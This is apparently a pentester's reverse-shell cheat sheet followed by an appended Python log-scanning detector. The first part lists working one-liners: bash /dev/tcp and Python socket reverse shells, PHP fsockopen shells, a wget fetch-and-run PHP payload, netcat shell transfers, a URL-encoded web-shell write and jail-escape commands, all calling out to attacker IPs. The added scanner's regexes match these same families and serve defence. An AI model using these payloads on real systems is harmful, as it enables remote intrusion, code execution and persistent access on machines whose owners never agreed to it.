Reverse Shell

https://highon.coffee/blog/reverse-shell-cheat-sheet/

connect back at 103 with bash

bash -i >& /dev/tcp/192.168.8.104/1234 0>&1

python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php with bash

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.8.104/8888 0>&1'"); ?>

php reverse shell.txt, to host

<?php $sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

to download and execute shell

<?php system("wget 192.168.8.103/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>

transfer shell with nc

nc -lvp 1234 < php_reverse_shell.php
cmd=nc 192.168.8.102 123 > reverse-shell.php
-w 1
-q 1
/browse.php?file=/tmp/shell2.php&cmd=nc+-w+1+10.10.14.4+5555+>+/tmp/shell5.php

Is it possible to break out of “jail” shell

python -c "import pty; pty.spawn('/bin/bash');"

echo os.system('/bin/bash')

/bin/sh -i

vi -> :sh or :!UNIX_command

awk 'BEGIN{system("/bin/bash")}'

echo+%22%3C%3Fphp+system(\$_GET['cmd']);%3F%3E%22+>+/tmp/shell2.php
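
Detection side of the one-liners above, as an added example (not part of the original notes): a small Python scanner that flags these command families in process-execution or web-access log lines. The rule names, the log line layout and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Rule names are made up for this example; each pattern keys on one one-liner family above.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    ("socket_dup2", re.compile(r"socket\.socket\(.*os\.dup2\(.*fileno\(\)")),
    ("php_fsockopen_shell", re.compile(r"fsockopen\(.*/bin/(ba)?sh\s+-i")),
    ("fetch_then_run", re.compile(
        r"\b(wget|curl)\b[^;|&]*-O\s*/(tmp|dev/shm)/\S+\s*;\s*\S+\s+/(tmp|dev/shm)/")),
    ("nc_to_file", re.compile(
        r"\bnc(at)?\b[^|;]*\s\d{1,3}(\.\d{1,3}){3}\s+\d+\s*>\s*\S+")),
    ("pty_spawn", re.compile(r"pty\.spawn\(\s*['\"]/bin/(ba)?sh")),
    ("awk_system_shell", re.compile(r"\bawk\b.*system\(\s*['\"]/bin/(ba)?sh")),
]

# Copy-pasted commands often carry typographic quotes; fold them to ASCII first.
SMART_QUOTES = str.maketrans({"“": '"', "”": '"', "‘": "'", "’": "'", "′": "'"})

def normalize(line):
    """URL-decode (web logs carry cmd= values encoded) and fold quotes."""
    return unquote_plus(line).translate(SMART_QUOTES)

def scan(lines):
    """Return (line_number, rule_name) for every rule that fires."""
    hits = []
    for number, raw in enumerate(lines, 1):
        text = normalize(raw)
        hits.extend((number, name) for name, rx in RULES if rx.search(text))
    return hits

# Constructed sample: execve-style and web-access-style lines, documentation IPs.
SAMPLE = [
    "EXECVE bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "GET /browse.php?file=/tmp/x.php&cmd=nc+-w+1+192.0.2.10+5555+>+/tmp/y.php",
    "EXECVE python -c import pty; pty.spawn('/bin/bash');",
    "EXECVE wget 192.0.2.10/s.txt -O /tmp/s.php; php /tmp/s.php",
    "EXECVE wget https://example.org/pkg.tgz -O /home/dev/pkg.tgz",  # benign
    "EXECVE nc -zv 192.0.2.20 22",                                   # benign
]

if __name__ == "__main__":
    for number, name in scan(SAMPLE):
        print(f"line {number}: {name}")
```

The patterns are string signatures only, so they miss encoded or obfuscated variants; pair them with egress monitoring for shells holding outbound sockets.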